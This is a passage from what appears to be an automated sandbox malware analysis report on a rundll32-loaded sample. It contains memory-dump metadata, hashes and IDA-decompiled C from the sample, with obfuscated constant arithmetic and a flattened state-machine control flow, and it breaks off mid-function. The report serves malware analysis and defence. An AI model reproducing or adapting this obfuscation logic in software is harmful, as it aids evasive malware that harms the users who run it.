                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "$ $(|?|$;]z$='mm$?$I*5$J&9$J&9$LCl$c@9$lT&$t1 $Y($>
                                                                                                                      • API String ID: 0-1427316221
                                                                                                                      • Opcode ID: a2412b40e0c09a574c3d1c475fd922a74219b43ef7cb11ded0b910deee92b11a
                                                                                                                      • Instruction ID: 7a9e4708305e8260f56442ba528f44890a61e0d6c20145b39314b010f4316b03
                                                                                                                      • Opcode Fuzzy Hash: a2412b40e0c09a574c3d1c475fd922a74219b43ef7cb11ded0b910deee92b11a
                                                                                                                      • Instruction Fuzzy Hash: 4472E1715093818FD3B8DF25C58AB8BBBE2FBC5304F10891DE5DA96260DBB58949CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0069AE6D(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				char _v12;
                                                                                                                      				char _v16;
                                                                                                                      				intOrPtr _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				char _v28;
                                                                                                                      				char _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				unsigned int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				signed int _v236;
                                                                                                                      				signed int _v240;
                                                                                                                      				signed int _v244;
                                                                                                                      				signed int _v248;
                                                                                                                      				signed int _v252;
                                                                                                                      				signed int _v256;
                                                                                                                      				signed int _v260;
                                                                                                                      				signed int _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				signed int _v272;
                                                                                                                      				void* _t537;
                                                                                                                      				void* _t566;
                                                                                                                      				void* _t567;
                                                                                                                      				intOrPtr _t573;
    void* _t575;
    void* _t577;
    void* _t585;
    void* _t588;
    void* _t594;
    void* _t596;
    signed int _t603;
    signed int _t604;
    signed int _t605;
    signed int _t606;
    signed int _t607;
    signed int _t608;
    signed int _t609;
    signed int _t610;
    void* _t611;
    void* _t633;
    void* _t660;
    void* _t675;
    intOrPtr _t677;
    intOrPtr _t680;
    signed int* _t682;
    void* _t685;

    _push(_a20);
    _t677 = __edx;
    _push(_a16);
    _v24 = __edx;
    _push(0x20);
    _push(_a8);
    _push(_a4);
    _push(__edx);
    _push(__ecx);
    E006920B9(_t537);
    _v8 = 0x673696;
    _t680 = 0;
    _v4 = 0;
    _t682 =  &(( &_v272)[7]);
    _v144 = 0xf00d33;
    _v144 = _v144 | 0x228e8b2e;
    _t596 = 0x1d3710;
    _v144 = _v144 >> 8;
    _v144 = _v144 ^ 0x0022fe8f;
    _v244 = 0xde08aa;
    _t603 = 0x17;
    _v244 = _v244 / _t603;
    _v244 = _v244 + 0xffff54ea;
    _v244 = _v244 << 0xa;
    _v244 = _v244 ^ 0x23f0fc00;
    _v224 = 0x36cb35;
    _v224 = _v224 | 0xc39aec51;
    _v224 = _v224 + 0x9146;
    _t604 = 0x62;
    _v224 = _v224 * 0x70;
    _v224 = _v224 ^ 0xa3c851d0;
    _v116 = 0xf2e64b;
    _v116 = _v116 << 5;
    _v116 = _v116 ^ 0x1e5cc960;
    _v248 = 0x2b7d5f;
    _t43 =  &_v248; // 0x2b7d5f
    _v248 =  *_t43 * 0x53;
    _v248 = _v248 + 0x8561;
    _v248 = _v248 | 0xae4dc352;
    _v248 = _v248 ^ 0xae5feb7e;
    _v80 = 0xe6036b;
    _v80 = _v80 * 0xb;
    _v80 = _v80 ^ 0x09e22599;
    _v240 = 0x5b8b4f;
    _v240 = _v240 + 0xffffe1e0;
    _v240 = _v240 ^ 0xb7b7812a;
    _v240 = _v240 + 0xffff41e0;
    _v240 = _v240 ^ 0xb7ec2de5;
    _v232 = 0xf81ab6;
    _v232 = _v232 ^ 0xa56b9217;
    _v232 = _v232 | 0x431a55e8;
    _v232 = _v232 << 7;
    _v232 = _v232 ^ 0xcdeef480;
    _v184 = 0xddfe73;
    _v184 = _v184 * 0x26;
    _v184 = _v184 << 8;
    _v184 = _v184 ^ 0xf3c51200;
    _v120 = 0x644fb5;
    _v120 = _v120 >> 6;
    _v120 = _v120 / _t604;
    _v120 = _v120 ^ 0x00000418;
    _v60 = 0xc6ff9f;
    _v60 = _v60 ^ 0x0d96ce7d;
    _v60 = _v60 ^ 0x0d5031e2;
    _v204 = 0xeedb74;
    _v204 = _v204 >> 0xb;
    _v204 = _v204 >> 0xa;
    _v204 = _v204 | 0xba569879;
    _v204 = _v204 ^ 0xba56987f;
    _v268 = 0x9a0618;
    _v268 = _v268 ^ 0x10270239;
    _v268 = _v268 ^ 0x733075d3;
    _t605 = 0x16;
    _v268 = _v268 / _t605;
    _v268 = _v268 ^ 0x04865c22;
    _v160 = 0x655fad;
    _v160 = _v160 >> 3;
    _v160 = _v160 >> 4;
    _v160 = _v160 ^ 0x0009a8dc;
    _v272 = 0x9202;
    _v272 = _v272 | 0xfb135803;
    _t606 = 0x41;
    _v272 = _v272 * 0x2c;
    _v272 = _v272 << 1;
    _v272 = _v272 ^ 0x4ed07035;
    _v100 = 0x536289;
    _v100 = _v100 << 9;
    _v100 = _v100 ^ 0xa6cd28cf;
    _v108 = 0xf021d8;
    _v108 = _v108 ^ 0x8f8b6ed2;
    _v108 = _v108 ^ 0x8f701d8c;
    _v152 = 0xcba027;
    _v152 = _v152 ^ 0xce0cd109;
    _v152 = _v152 | 0x7dfb06f6;
    _v152 = _v152 ^ 0xfff88f5e;
    _v252 = 0xf09c41;
    _v252 = _v252 + 0x8e2a;
    _v252 = _v252 << 3;
    _v252 = _v252 | 0xdb831f2c;
    _v252 = _v252 ^ 0xdf846234;
    _v260 = 0x3d692f;
    _v260 = _v260 << 2;
    _v260 = _v260 | 0xbfb4a027;
    _v260 = _v260 + 0x643;
    _v260 = _v260 ^ 0xbffb0fde;
    _v92 = 0x80bca7;
    _v92 = _v92 >> 0xa;
    _v92 = _v92 ^ 0x00038c1c;
    _v228 = 0xbbbc43;
    _v228 = _v228 | 0x61282476;
    _v228 = _v228 + 0xffff6ee2;
    _v228 = _v228 * 0x69;
    _v228 = _v228 ^ 0x15ccd750;
    _v236 = 0xc2062f;
    _v236 = _v236 | 0xf7f3ef67;
    _v236 = _v236 * 0x5c;
    _v236 = _v236 ^ 0x1ba01eed;
    _v128 = 0xa773bc;
    _v128 = _v128 << 0x10;
    _v128 = _v128 | 0xe162daa5;
    _v128 = _v128 ^ 0xf3f36b57;
    _v136 = 0x3287f3;
    _v136 = _v136 / _t606;
    _v136 = _v136 >> 9;
    _v136 = _v136 ^ 0x000c37d1;
    _v104 = 0x8d5fef;
    _v104 = _v104 + 0xffff56ea;
    _v104 = _v104 ^ 0x008f942b;
    _v44 = 0xd6bac6;
    _v44 = _v44 * 0x7f;
    _v44 = _v44 ^ 0x6a80c639;
    _v148 = 0xa4165e;
    _v148 = _v148 * 0x13;
    _v148 = _v148 | 0x84e82f79;
    _v148 = _v148 ^ 0x8cef9599;
    _v96 = 0xfc4916;
    _v96 = _v96 + 0xffff0795;
    _v96 = _v96 ^ 0x00f5cebb;
    _v132 = 0xd5d7c2;
    _v132 = _v132 >> 0x10;
    _v132 = _v132 << 0xd;
    _v132 = _v132 ^ 0x0010cc3c;
    _v264 = 0xf6e8cb;
    _v264 = _v264 + 0x6576;
    _v264 = _v264 + 0x7b15;
    _v264 = _v264 + 0x6b9c;
    _v264 = _v264 ^ 0x00fe3ec7;
    _v208 = 0x3a8541;
    _v208 = _v208 | 0x57459f57;
    _v208 = _v208 ^ 0x66631a8c;
    _v208 = _v208 | 0x178bfabb;
    _v208 = _v208 ^ 0x379a2cb6;
    _v56 = 0x33c5e6;
    _v56 = _v56 + 0x441;
    _v56 = _v56 ^ 0x0035e6a0;
    _v172 = 0x2bd4df;
    _v172 = _v172 + 0xda1f;
    _v172 = _v172 + 0x8171;
    _v172 = _v172 ^ 0x002cd084;
    _v48 = 0x796d26;
    _v48 = _v48 + 0xffff3152;
    _v48 = _v48 ^ 0x00766b67;
    _v88 = 0xfc738c;
    _v88 = _v88 << 0xe;
    _v88 = _v88 ^ 0x1ce8da45;
    _v140 = 0x79fdd0;
    _v140 = _v140 >> 0xe;
    _v140 = _v140 * 0x78;
    _v140 = _v140 ^ 0x000f2c53;
    _v64 = 0xd0b1f6;
    _v64 = _v64 >> 9;
    _v64 = _v64 ^ 0x000411a2;
    _v200 = 0xaa2240;
    _v200 = _v200 | 0x35f3f2d4;
    _v200 = _v200 + 0x4147;
    _v200 = _v200 + 0xffff1702;
    _v200 = _v200 ^ 0x35f16a60;
    _v52 = 0x980f89;
    _v52 = _v52 ^ 0xc15a5b47;
    _v52 = _v52 ^ 0xc1c323e9;
    _v216 = 0xb7a8b5;
    _v216 = _v216 >> 3;
    _v216 = _v216 ^ 0xa2f7ad91;
    _v216 = _v216 + 0xfffff0a8;
    _v216 = _v216 ^ 0xa2ec62b8;
    _v72 = 0x73581d;
    _v72 = _v72 + 0xffffc838;
    _v72 = _v72 ^ 0x00777119;
    _v164 = 0x873053;
    _v164 = _v164 ^ 0xefe323e3;
    _v164 = _v164 | 0xd91bba05;
    _v164 = _v164 ^ 0xff705bac;
    _v40 = 0xf8d5df;
    _v40 = _v40 ^ 0x79f853d7;
    _v40 = _v40 ^ 0x79053437;
    _v192 = 0x180af0;
    _v192 = _v192 + 0xffff4c14;
    _v192 = _v192 << 8;
    _v192 = _v192 + 0x2aad;
    _v192 = _v192 ^ 0x175759c3;
    _v256 = 0x23b549;
    _v256 = _v256 + 0x5eb6;
    _v256 = _v256 | 0xffb7bbff;
    _v256 = _v256 ^ 0xffb807e9;
    _v176 = 0xc1fdd5;
    _v176 = _v176 >> 0xc;
    _v176 = _v176 | 0x5151af8d;
    _v176 = _v176 ^ 0x515c7a4b;
    _v112 = 0xec5780;
    _v112 = _v112 ^ 0x97b4c021;
    _v112 = _v112 ^ 0x9750bd7e;
    _v180 = 0x591b41;
    _v180 = _v180 + 0x207e;
    _v180 = _v180 + 0xffffc81d;
    _v180 = _v180 ^ 0x005ca8dc;
    _v68 = 0x76fd1d;
    _t675 = 0x5c52c4a;
    _v68 = _v68 | 0x9e2d4356;
    _v68 = _v68 ^ 0x9e728261;
    _v76 = 0xf22a3;
    _v76 = _v76 | 0x9c703035;
    _v76 = _v76 ^ 0x9c7b5f20;
    _v220 = 0x3decab;
    _v220 = _v220 << 8;
    _v220 = _v220 ^ 0x53082a5e;
    _v220 = _v220 >> 0xd;
    _v220 = _v220 ^ 0x0004d715;
    _v84 = 0x6eb476;
                                                                                                                      				_v84 = _v84 << 0xd;
                                                                                                                      				_v84 = _v84 ^ 0xd68135de;
                                                                                                                      				_v124 = 0x458e11;
                                                                                                                      				_v124 = _v124 | 0x336f5b57;
                                                                                                                      				_t607 = 0x43;
                                                                                                                      				_v124 = _v124 / _t607;
                                                                                                                      				_v124 = _v124 ^ 0x00c97d17;
                                                                                                                      				_v156 = 0x7cba2c;
                                                                                                                      				_t608 = 0x4b;
                                                                                                                      				_v156 = _v156 / _t608;
                                                                                                                      				_v156 = _v156 | 0x0b494d21;
                                                                                                                      				_v156 = _v156 ^ 0x0b48f5d9;
                                                                                                                      				_v36 = 0x519404;
                                                                                                                      				_v36 = _v36 << 8;
                                                                                                                      				_v36 = _v36 ^ 0x5195ba3f;
                                                                                                                      				_v168 = 0xf13e55;
                                                                                                                      				_v168 = _v168 | 0x95edbe5f;
                                                                                                                      				_v168 = _v168 ^ 0xd6548190;
                                                                                                                      				_v168 = _v168 ^ 0x43a3dbfd;
                                                                                                                      				_v188 = 0xdd4a71;
                                                                                                                      				_v188 = _v188 + 0xffff5bb0;
                                                                                                                      				_v188 = _v188 >> 0xb;
                                                                                                                      				_v188 = _v188 >> 6;
                                                                                                                      				_v188 = _v188 ^ 0x000a03ec;
                                                                                                                      				_v196 = 0x58b29f;
                                                                                                                      				_t609 = 0x22;
                                                                                                                      				_v196 = _v196 / _t609;
                                                                                                                      				_v196 = _v196 + 0xffff713e;
                                                                                                                      				_v196 = _v196 + 0xffff146a;
                                                                                                                      				_v196 = _v196 ^ 0x000c9f67;
                                                                                                                      				_v212 = 0xc056c;
                                                                                                                      				_t610 = 0x45;
                                                                                                                      				_v212 = _v212 * 0x51;
                                                                                                                      				_v212 = _v212 >> 0xc;
                                                                                                                      				_v212 = _v212 / _t610;
                                                                                                                      				_v212 = _v212 ^ 0x0007774b;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t566 = 0x6c6f684;
                                                                                                                      					while(1) {
                                                                                                                      						L2:
                                                                                                                      						_t611 = 0x92c3a26;
                                                                                                                      						while(1) {
                                                                                                                      							L3:
                                                                                                                      							do {
                                                                                                                      								while(1) {
                                                                                                                      									L4:
                                                                                                                      									_t685 = _t596 - _t675;
                                                                                                                      									if(_t685 > 0) {
                                                                                                                      										break;
                                                                                                                      									}
                                                                                                                      									if(_t685 == 0) {
                                                                                                                      										E00696BC6(_v124, _v32, _v156);
                                                                                                                      										_t596 = 0x4bc1ff4;
                                                                                                                      										goto L1;
                                                                                                                      									} else {
                                                                                                                      										if(_t596 == 0x1d3710) {
                                                                                                                      											_t596 = 0x6d0da1a;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											if(_t596 == 0x19992af) {
                                                                                                                      												_push(_t611);
                                                                                                                      												_push(_t611);
                                                                                                                      												_t573 = E00687FF2(_v16);
                                                                                                                      												__eflags = _t573;
                                                                                                                      												_v20 = _t573;
                                                                                                                      												_t660 = 0x19c2787;
                                                                                                                      												_t596 =  !=  ? 0x19c2787 : 0x87f6c1b;
                                                                                                                      												_t566 = 0x6c6f684;
                                                                                                                      												_t611 = 0x92c3a26;
                                                                                                                      												continue;
                                                                                                                      											} else {
                                                                                                                      												if(_t596 == _t660) {
                                                                                                                      													_t575 = E00697B05(_v16,  &_v32, _v28, _v216, _v72, _v164, _v248, _v40, _v80, _t611, _v192, _v256, _v20);
                                                                                                                      													_t682 =  &(_t682[0xc]);
                                                                                                                      													__eflags = _t575 - _v240;
                                                                                                                      													_t611 = 0x92c3a26;
                                                                                                                      													_t566 = 0x6c6f684;
                                                                                                                      													_t596 =  ==  ? 0x92c3a26 : 0x4bc1ff4;
                                                                                                                      													goto L3;
                                                                                                                      												} else {
                                                                                                                      													if(_t596 == 0x489cb15) {
                                                                                                                      														_push(_v148);
                                                                                                                      														_push(_v44);
                                                                                                                      														_t577 = E0069DCF7(_v104, 0x6818b4, __eflags);
                                                                                                                      														_pop(_t633);
                                                                                                                      														__eflags = E006A0B68(_t577,  &_v12, _v224, _v96, _t633,  &_v16, _v132, _v264, _v208, _v56, _v28, _v172) - _v116;
                                                                                                                      														_t596 =  ==  ? 0x19992af : 0x87f6c1b;
                                                                                                                      														E0068A8B0(_v48, _t577, _v88);
                                                                                                                      														_t677 = _v24;
                                                                                                                      														_t682 =  &(_t682[0xb]);
                                                                                                                      														L24:
                                                                                                                      														_t566 = 0x6c6f684;
                                                                                                                      														_t611 = 0x92c3a26;
                                                                                                                      														_t660 = 0x19c2787;
                                                                                                                      														goto L25;
                                                                                                                      													} else {
                                                                                                                      														if(_t596 != 0x4bc1ff4) {
                                                                                                                      															goto L25;
                                                                                                                      														} else {
                                                                                                                      															E00698519(_v36, _v168, _v20);
                                                                                                                      															_t596 = 0x87f6c1b;
                                                                                                                      															while(1) {
                                                                                                                      																L1:
                                                                                                                      																_t566 = 0x6c6f684;
                                                                                                                      																L2:
                                                                                                                      																_t611 = 0x92c3a26;
                                                                                                                      																L3:
                                                                                                                      																goto L4;
                                                                                                                      															}
                                                                                                                      														}
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      									L28:
                                                                                                                      									return _t680;
                                                                                                                      								}
                                                                                                                      								__eflags = _t596 - _t566;
                                                                                                                      								if(_t596 == _t566) {
                                                                                                                      									_t567 = E0069828A(_v68, _v76, _v220, _t677, _v120, 0x20, _v84, _v32);
                                                                                                                      									_t682 =  &(_t682[6]);
                                                                                                                      									_t596 = _t675;
                                                                                                                      									__eflags = _t567 - _v60;
                                                                                                                      									_t680 =  ==  ? 1 : _t680;
                                                                                                                      									goto L24;
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t596 - 0x6d0da1a;
                                                                                                                      									if(__eflags == 0) {
                                                                                                                      										_push(_v272);
                                                                                                                      										_push(_v160);
                                                                                                                      										_t585 = E0069DCF7(_v268, 0x681884, __eflags);
                                                                                                                      										_push(_v152);
                                                                                                                      										_push(_v108);
                                                                                                                      										_t588 = E00689462(_t585, _v260,  &_v28, E0069DCF7(_v100, 0x681814, __eflags), _v92, _v144);
                                                                                                                      										_t682 =  &(_t682[9]);
                                                                                                                      										__eflags = _t588 - _v244;
                                                                                                                      										_t596 =  ==  ? 0x489cb15 : 0x822e036;
                                                                                                                      										E0068A8B0(_v228, _t585, _v236);
                                                                                                                      										E0068A8B0(_v128, _t586, _v136);
                                                                                                                      										_t677 = _v24;
                                                                                                                      										_t675 = 0x5c52c4a;
                                                                                                                      										goto L24;
                                                                                                                      									} else {
                                                                                                                      										__eflags = _t596 - 0x87f6c1b;
                                                                                                                      										if(_t596 == 0x87f6c1b) {
                                                                                                                      											E0068957D(_v28, _v188, _v196, _v204, _v212);
                                                                                                                      										} else {
                                                                                                                      											__eflags = _t596 - _t611;
                                                                                                                      											if(_t596 != _t611) {
                                                                                                                      												goto L25;
                                                                                                                      											} else {
                                                                                                                      												_t594 = E0068A81D(_v32, _a4, _v176, _v112, _v232, _a20, _v180);
                                                                                                                      												_t682 =  &(_t682[5]);
                                                                                                                      												__eflags = _t594 - _v184;
                                                                                                                      												_t566 = 0x6c6f684;
                                                                                                                      												_t596 =  ==  ? 0x6c6f684 : _t675;
                                                                                                                      												goto L2;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								goto L28;
                                                                                                                      								L25:
                                                                                                                      								__eflags = _t596 - 0x822e036;
                                                                                                                      							} while (__eflags != 0);
                                                                                                                      							goto L28;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x0069affd
                                                                                                                      0x0069b00a
                                                                                                                      0x0069b00e
                                                                                                                      0x0069b013
                                                                                                                      0x0069b01b
                                                                                                                      0x0069b026
                                                                                                                      0x0069b037
                                                                                                                      0x0069b03e
                                                                                                                      0x0069b049
                                                                                                                      0x0069b054
                                                                                                                      0x0069b05f
                                                                                                                      0x0069b06a
                                                                                                                      0x0069b072
                                                                                                                      0x0069b077
                                                                                                                      0x0069b07e
                                                                                                                      0x0069b086
                                                                                                                      0x0069b08e
                                                                                                                      0x0069b096
                                                                                                                      0x0069b09e
                                                                                                                      0x0069b0ac
                                                                                                                      0x0069b0b1
                                                                                                                      0x0069b0b7
                                                                                                                      0x0069b0bf
                                                                                                                      0x0069b0ca
                                                                                                                      0x0069b0d2
                                                                                                                      0x0069b0da
                                                                                                                      0x0069b0e5
                                                                                                                      0x0069b0ed
                                                                                                                      0x0069b0fa
                                                                                                                      0x0069b0fb
                                                                                                                      0x0069b0ff
                                                                                                                      0x0069b103
                                                                                                                      0x0069b10b
                                                                                                                      0x0069b116
                                                                                                                      0x0069b11e
                                                                                                                      0x0069b129
                                                                                                                      0x0069b134
                                                                                                                      0x0069b13f
                                                                                                                      0x0069b14a
                                                                                                                      0x0069b155
                                                                                                                      0x0069b160
                                                                                                                      0x0069b16b
                                                                                                                      0x0069b176
                                                                                                                      0x0069b17e
                                                                                                                      0x0069b186
                                                                                                                      0x0069b18b
                                                                                                                      0x0069b193
                                                                                                                      0x0069b19b
                                                                                                                      0x0069b1a3
                                                                                                                      0x0069b1a8
                                                                                                                      0x0069b1b0
                                                                                                                      0x0069b1b8
                                                                                                                      0x0069b1c0
                                                                                                                      0x0069b1cb
                                                                                                                      0x0069b1d3
                                                                                                                      0x0069b1de
                                                                                                                      0x0069b1e6
                                                                                                                      0x0069b1ee
                                                                                                                      0x0069b1fb
                                                                                                                      0x0069b1ff
                                                                                                                      0x0069b207
                                                                                                                      0x0069b20f
                                                                                                                      0x0069b21c
                                                                                                                      0x0069b220
                                                                                                                      0x0069b228
                                                                                                                      0x0069b233
                                                                                                                      0x0069b23b
                                                                                                                      0x0069b246
                                                                                                                      0x0069b251
                                                                                                                      0x0069b265
                                                                                                                      0x0069b26c
                                                                                                                      0x0069b274
                                                                                                                      0x0069b27f
                                                                                                                      0x0069b28a
                                                                                                                      0x0069b295
                                                                                                                      0x0069b2a0
                                                                                                                      0x0069b2b3
                                                                                                                      0x0069b2ba
                                                                                                                      0x0069b2c5
                                                                                                                      0x0069b2d8
                                                                                                                      0x0069b2df
                                                                                                                      0x0069b2ea
                                                                                                                      0x0069b2f5
                                                                                                                      0x0069b300
                                                                                                                      0x0069b30b
                                                                                                                      0x0069b316
                                                                                                                      0x0069b321
                                                                                                                      0x0069b329
                                                                                                                      0x0069b331
                                                                                                                      0x0069b33c
                                                                                                                      0x0069b344
                                                                                                                      0x0069b34c
                                                                                                                      0x0069b354
                                                                                                                      0x0069b35c
                                                                                                                      0x0069b364
                                                                                                                      0x0069b36c
                                                                                                                      0x0069b374
                                                                                                                      0x0069b37c
                                                                                                                      0x0069b384
                                                                                                                      0x0069b38c
                                                                                                                      0x0069b397
                                                                                                                      0x0069b3a2
                                                                                                                      0x0069b3ad
                                                                                                                      0x0069b3b5
                                                                                                                      0x0069b3bd
                                                                                                                      0x0069b3c5
                                                                                                                      0x0069b3cd
                                                                                                                      0x0069b3d8
                                                                                                                      0x0069b3e3
                                                                                                                      0x0069b3ee
                                                                                                                      0x0069b3f9
                                                                                                                      0x0069b401
                                                                                                                      0x0069b40c
                                                                                                                      0x0069b417
                                                                                                                      0x0069b427
                                                                                                                      0x0069b42e
                                                                                                                      0x0069b439
                                                                                                                      0x0069b444
                                                                                                                      0x0069b44c
                                                                                                                      0x0069b457
                                                                                                                      0x0069b45f
                                                                                                                      0x0069b467
                                                                                                                      0x0069b46f
                                                                                                                      0x0069b477
                                                                                                                      0x0069b47f
                                                                                                                      0x0069b48a
                                                                                                                      0x0069b495
                                                                                                                      0x0069b4a0
                                                                                                                      0x0069b4a8
                                                                                                                      0x0069b4ad
                                                                                                                      0x0069b4b5
                                                                                                                      0x0069b4bd
                                                                                                                      0x0069b4c5
                                                                                                                      0x0069b4d0
                                                                                                                      0x0069b4db
                                                                                                                      0x0069b4e6
                                                                                                                      0x0069b4ee
                                                                                                                      0x0069b4f6
                                                                                                                      0x0069b4fe
                                                                                                                      0x0069b506
                                                                                                                      0x0069b511
                                                                                                                      0x0069b51c
                                                                                                                      0x0069b527
                                                                                                                      0x0069b52f
                                                                                                                      0x0069b537
                                                                                                                      0x0069b53c
                                                                                                                      0x0069b544
                                                                                                                      0x0069b54c
                                                                                                                      0x0069b554
                                                                                                                      0x0069b55c
                                                                                                                      0x0069b564
                                                                                                                      0x0069b56c
                                                                                                                      0x0069b574
                                                                                                                      0x0069b579
                                                                                                                      0x0069b581
                                                                                                                      0x0069b589
                                                                                                                      0x0069b594
                                                                                                                      0x0069b59f
                                                                                                                      0x0069b5aa
                                                                                                                      0x0069b5b2
                                                                                                                      0x0069b5ba
                                                                                                                      0x0069b5c2
                                                                                                                      0x0069b5cc
                                                                                                                      0x0069b5d7
                                                                                                                      0x0069b5dc
                                                                                                                      0x0069b5e7
                                                                                                                      0x0069b5f2
                                                                                                                      0x0069b5fd
                                                                                                                      0x0069b608
                                                                                                                      0x0069b613
                                                                                                                      0x0069b61b
                                                                                                                      0x0069b620
                                                                                                                      0x0069b628
                                                                                                                      0x0069b62d
                                                                                                                      0x0069b635
                                                                                                                      0x0069b640
                                                                                                                      0x0069b648
                                                                                                                      0x0069b653
                                                                                                                      0x0069b65e
                                                                                                                      0x0069b672
                                                                                                                      0x0069b677
                                                                                                                      0x0069b680
                                                                                                                      0x0069b68b
                                                                                                                      0x0069b69d
                                                                                                                      0x0069b6a2
                                                                                                                      0x0069b6ab
                                                                                                                      0x0069b6b6
                                                                                                                      0x0069b6c1
                                                                                                                      0x0069b6cc
                                                                                                                      0x0069b6d4
                                                                                                                      0x0069b6df
                                                                                                                      0x0069b6e7
                                                                                                                      0x0069b6ef
                                                                                                                      0x0069b6f7
                                                                                                                      0x0069b6ff
                                                                                                                      0x0069b707
                                                                                                                      0x0069b70f
                                                                                                                      0x0069b714
                                                                                                                      0x0069b719
                                                                                                                      0x0069b721
                                                                                                                      0x0069b72d
                                                                                                                      0x0069b732
                                                                                                                      0x0069b738
                                                                                                                      0x0069b740
                                                                                                                      0x0069b748
                                                                                                                      0x0069b750
                                                                                                                      0x0069b75d
                                                                                                                      0x0069b75e
                                                                                                                      0x0069b762
                                                                                                                      0x0069b76d
                                                                                                                      0x0069b771
                                                                                                                      0x0069b779
                                                                                                                      0x0069b779
                                                                                                                      0x0069b779
                                                                                                                      0x0069b77e
                                                                                                                      0x0069b77e
                                                                                                                      0x0069b77e

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: &:,$&:,$&:,$&:,$/i=$GA$Kz\Q$W[o3$_}+$gkv$v$(a$ve$~ $#$1P
                                                                                                                      • API String ID: 0-1587349264
                                                                                                                      • Opcode ID: 836b69fe1a3394412ab7419254dce1bffbcb9f6ab428dad3e5968dad3c8ae874
                                                                                                                      • Instruction ID: 6aa1c1276f098050ef3b7191916308c6d3c3071175deae7a53cdbc2779475582
                                                                                                                      • Opcode Fuzzy Hash: 836b69fe1a3394412ab7419254dce1bffbcb9f6ab428dad3e5968dad3c8ae874
                                                                                                                      • Instruction Fuzzy Hash: 23520F711093809FD7B8CF61D58AA9BBBE2BBC4304F10891DE6DA96260D7B18949CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E00695CC4() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				void* _v1572;
                                                                                                                      				intOrPtr _v1576;
                                                                                                                      				signed int _v1580;
                                                                                                                      				signed int _v1584;
                                                                                                                      				signed int _v1588;
                                                                                                                      				signed int _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _v1672;
                                                                                                                      				signed int _v1676;
                                                                                                                      				signed int _v1680;
                                                                                                                      				signed int _v1684;
                                                                                                                      				signed int _v1688;
                                                                                                                      				signed int _v1692;
